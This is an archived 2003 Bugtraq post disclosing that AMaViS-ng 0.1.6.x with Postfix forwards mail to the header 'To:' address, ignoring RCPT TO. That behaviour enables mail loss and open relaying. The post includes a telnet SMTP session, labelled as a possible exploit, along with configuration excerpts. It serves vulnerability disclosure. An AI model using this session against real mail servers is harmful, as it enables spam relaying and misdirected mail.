lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Date: Mon, 7 Apr 2003 14:23:47 +0200
From: Phil Cyc <ajEA3UMBepQ4MRExDmm0qbFeeQEJtffpg.1@...tected.unixadm.org>
To: bugtraq@...urityfocus.com
Subject: AMaViS-ng 0.1.6.x and postfix: possible open relay and mail loss


Hi everyone -

with postfix using AMaViS-ng 0.1.6.x (tested: 0.1.6.2 and 0.1.6.3; 0.1.4.x is 
not vulnerable), all email gets forwarded to the address specified by the 
"To:" header line, ignoring the real recipient given via "RCPT TO:".

Possible exploit:
--%snip%--
#> telnet somemx.domain.tld 25
(220 somemx.domain.tld ESMTP Postfix)
helo amavis-ng
(250 somemx.domain.tld)
mail from:userX@...ainX.tld
(250 ok)
rcpt to:userY@...ain.tld
(250 ok)
data
(354 End data with <CR><LF>.<CR><LF>)
From: userX@...ainX.tld
To: userZ@...ainZ.tld
Subject: AMaViS-ng 0.1.6.x bug
.
(250 Ok: queued as ...)
quit
(221 Bye)
--%snip%--

Requirements: The mx (somemx.domain.tld) having postfix and AMaViS-ng 0.1.6.x 
installed must accept emails for userY@...ain.tld.

What does it to:
userX@...ainX.tld is sending an email to userY@...ain.tld. The header of this 
email contains "To: userZ@...ain.tld". AMaViS-ng seems to parse the header 
and forwards the email to userZ@...ain.tld. userY@...ain.tld does not get 
this email.
As many postfix users trust their localhost (no restrictions for localhost), 
it is possible to relay an email or a spam mail this way.

configuration files (relevant parts):

# $postfix/master.cf
smtp inet n - n - - smtpd -o content_filter=filter:
filter unix - n n - - pipe
  flags=Rq user=mail argv=/usr/bin/amavis ${sender} -- ${recipient}
# end of master.cf

# $amavis-ng/amavis.conf
[global]
mail-transfer-agent = Postfix

[Postfix]
postfix = /usr/sbin/sendmail
args = -i -f
# end of amavis.conf

There is no problem with AMaViS == 0.1.4.x

Kind regards,

Phil Cyc

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ